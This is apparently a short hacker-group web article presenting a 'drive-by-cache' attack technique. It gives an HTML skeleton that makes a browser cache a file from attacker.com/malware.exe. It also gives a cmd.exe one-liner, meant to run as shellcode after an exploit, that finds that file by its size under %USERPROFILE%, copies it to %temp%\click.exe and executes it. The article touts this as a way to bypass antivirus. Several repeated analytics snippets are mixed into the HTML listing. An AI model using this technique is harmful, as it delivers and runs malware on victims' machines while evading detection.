MenuAuthor : "vinnu"
Team : Legion Of Xtremers
Special Thanx : Secfence Team
Greets : Lord DeathStorm, Prashant Uniyal, b0nd, Fb1h2s, G4H, all my well/bad wishers.
Drive-by-Cache
This technique is an alternative to the heavily deployed drive-by-download. In this technique
the shellcode doesnt download anything from remote location unlike to the drive-by-download
shellcode.
In drive-by-cache technique, the malware is instead downloaded by the browser or application itself.
The URL of malware file can be specified into src of img, script,..., etc tags and the browser/application
downloads and saves it into its own cache folder.
Suppose, a malicious executable malware.exe resides on attacker.com, then following skelton is enough to force
the browser to download it:
<----dbc.htm---->
<html>
<body>
<script src="http://www.attacker.com/malware.exe"></script>
<!---
exploit code and shellcode
--->
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try{
var pageTracker = _gat._getTracker('UA-17311051-3');
pageTracker._trackPageview();
} catch(err) {}</script>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try{
var pageTracker = _gat._getTracker('UA-17311051-3');
pageTracker._trackPageview();
} catch(err) {}</script>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try{
var pageTracker = _gat._getTracker('UA-17311051-3');
pageTracker._trackPageview();
} catch(err) {}</script>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try{
var pageTracker = _gat._getTracker('UA-17311051-3');
pageTracker._trackPageview();
} catch(err) {}</script>
</body>
</html>
<!-------------->
The Locations of cache folders for different browsers differ, but all resides under the hood of %USERPROFILE%
folder deep inside.
The malware get downloaded prior to the exploitation and gets saved into the cache and then the exploit fires up
and if successfull, the shellcode will hunt for the file of same number of bytes as of malware.exe on attacker.com
server.
And the shellcode in this case is command execution. The hard part in this technique is to
search the file in browser's/application's cache, but the file is saved as a temp file in most cases.
So we need to copy the file with ".exe" extension and then execute it.
Suppose we have placed a (windows XP's) calc.exe on the server as malware.exe, then its size in bytes is
114688 bytes and following command will hunt it in %USERPROFILE% subfolders:
cmd.exe /c for /R "%USERPROFILE%\" %i IN (*) DO if %~zi equ 114688 cmd.exe /c copy "%i" "%temp%\click.exe" /y & "%temp%\click.exe"
Above command will copy the found file as click.exe in %temp% folder and execute it.
The main advantage of this technique is that most of antivirus gets bypassed safely as, browser/application
itself downloads the malicious file as general way.
..."vinnu"
G4H Facebook
Rate this article